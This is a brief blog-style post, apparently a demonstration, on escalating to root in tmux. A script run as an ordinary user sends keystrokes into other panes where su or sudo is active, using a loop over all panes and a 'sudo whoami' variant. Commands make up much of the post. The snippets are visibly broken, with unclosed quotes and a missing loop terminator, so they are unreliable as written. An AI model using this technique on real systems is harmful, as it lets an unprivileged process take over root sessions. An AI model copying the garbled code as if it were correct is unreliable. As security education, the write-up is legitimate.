tmux privilege escalation abusing send-keys

A script run as user in tmux can under some circumstances execute commands as root.


Did you know you can send keystrokes to other panes in tmux?
You can abuse send-keys to send commands to a root/sudo pane.
That's all there is to it, that's the trick.


There's a tmux feature to send keystrokes to a pane.
tmux send-keys -t $pane 'C-c' for example sends SIGINT to whatever is running in pane $pane.

man tmux

When I sae the send-keys feature, I was like:
"What if theres another pane, where the user is logged in as root?"



tmux sp  
su # login as root  

Now go back to the other tmux pane (where you are logged in as user).


Now run the following script, to execute whoami in every pane:

for pane in `tmux list-panes | grep -Po '^\d'`; do  
tmux send-keys -t $pane 'C-c'  
tmux send-keys -t $pane 'whoami  

You will see, as expected, the command whoami returned root.


With the same trick you can abuse that sudo was used in another pane.

tmux send-keys -t $pane 'sudo whoami  

. . /